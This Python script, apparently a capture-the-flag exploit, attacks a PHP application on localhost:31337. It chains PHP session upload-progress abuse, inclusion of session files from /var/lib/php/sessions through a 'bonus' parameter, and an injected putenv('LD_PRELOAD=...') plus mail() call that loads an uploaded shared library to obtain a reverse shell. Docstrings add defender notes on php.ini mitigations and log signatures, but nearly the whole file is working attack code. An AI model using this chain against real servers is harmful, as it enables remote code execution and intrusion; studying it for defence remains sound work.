import requests
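def attack1():
    """Post ``pay.so`` to the local test target as a multipart upload.

    The request carries a fixed ``PHPSESSID=pay1`` cookie, a
    ``PHP_SESSION_UPLOAD_PROGRESS`` form field and a ``chance``/``mode``
    query string.  The response is not inspected: the script prints
    ``"Upload Done"`` when the request raises and ``"Something is
    wrong..?"`` when it completes, i.e. an aborted request is treated as
    the expected outcome.

    Changes from the original: the file handle is closed on every path
    (it was only closed in the ``except`` branch), and the bare
    ``except`` is narrowed to ``Exception`` so Ctrl-C still interrupts.

    Defender note: a client-chosen session id combined with a
    ``PHP_SESSION_UPLOAD_PROGRESS`` field is the visible signature of
    session upload-progress abuse; ``session.upload_progress.enabled=0``
    in php.ini removes that primitive, and the pattern is easy to flag
    in web-server access logs.
    """
    HOST = 'http://localhost:31337/?chance=$r="a";$r["a"];&mode=chance'
    headers = {
        'Connection': 'close',
        'Cookie': 'PHPSESSID=pay1',
    }
    data = {'PHP_SESSION_UPLOAD_PROGRESS': 'preloooad'}
    with open("pay.so", "rb") as pay:
        try:
            requests.post(HOST, headers=headers, files={'f': pay}, data=data)
            # A completed request is the unexpected case for this step.
            print("Something is wrong..?")
        except Exception:
            # A failed/aborted request is what the script expects here.
            print("Upload Done")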
def attack2(lib):
    """Post a second upload-progress request whose progress field is PHP source.

    ``lib`` (the path returned by ``leak()``) is interpolated into a
    ``putenv("LD_PRELOAD=...")`` snippet that is sent as the
    ``PHP_SESSION_UPLOAD_PROGRESS`` form value under the fixed session id
    ``pay2``.  The upload body is the placeholder string ``"dummy"``, not a
    file.  Nothing from the response is read.

    Defender note: PHP source in a ``PHP_SESSION_UPLOAD_PROGRESS`` field and
    ``LD_PRELOAD`` strings in request bodies are both worth an alert;
    ``session.upload_progress.enabled=0`` and listing ``putenv`` in
    ``disable_functions`` remove the primitives this step depends on.
    """
    target = 'http://localhost:31337/'
    request_headers = {
        'Connection': 'close',
        'Cookie': 'PHPSESSID=pay2',
    }
    progress_value = '<?php putenv("LD_PRELOAD={}"); mail("","","","");?>'.format(lib)
    form = {'PHP_SESSION_UPLOAD_PROGRESS': progress_value}
    requests.post(target, headers=request_headers, files={'f': "dummy"}, data=form)
    print("Payload setting done")
def attack3():
    """Issue the final GET with ``bonus`` pointing at the ``sess_pay2`` session file.

    The response object is discarded; the function only announces the step.

    Defender note: a query parameter carrying an absolute path into
    ``/var/lib/php/sessions`` is a file-inclusion-shaped input — a good
    candidate for a WAF/log rule, independent of what the handler does with it.
    """
    print("Trying reverse shell")
    target = 'http://localhost:31337/?bonus=/var/lib/php/sessions/sess_pay2'
    requests.get(target)  # response intentionally unused
def leak():
    """Fetch the ``sess_pay1`` session file via ``bonus`` and pull a ``/tmp`` path out of it.

    Returns the substring of the response body that starts at the first
    ``'/tmp'`` and ends just before the next double quote.  As in the
    original, ``str.index`` raises ``ValueError`` if either marker is absent.

    Defender note: the response body is expected to echo session-file
    contents back to the client; seeing raw session data in HTTP responses
    is itself a finding worth investigating on the server side.
    """
    target = 'http://localhost:31337/?bonus=/var/lib/php/sessions/sess_pay1'
    body = requests.get(target).text
    start = body.index('/tmp')
    end = body.index('"', start)
    return body[start:end]
def exploit():
    """Run the four steps in order: upload, leak, set the payload, trigger.

    The path returned by ``leak()`` is printed and handed to ``attack2``;
    every step talks to the hard-coded ``localhost:31337`` target.
    """
    attack1()
    leaked_path = leak()
    print("[*] Leak:", leaked_path)
    attack2(leaked_path)
    attack3()
if __name__ == "__main__":
    # Script entry point: runs the whole chain against the localhost target.
    exploit()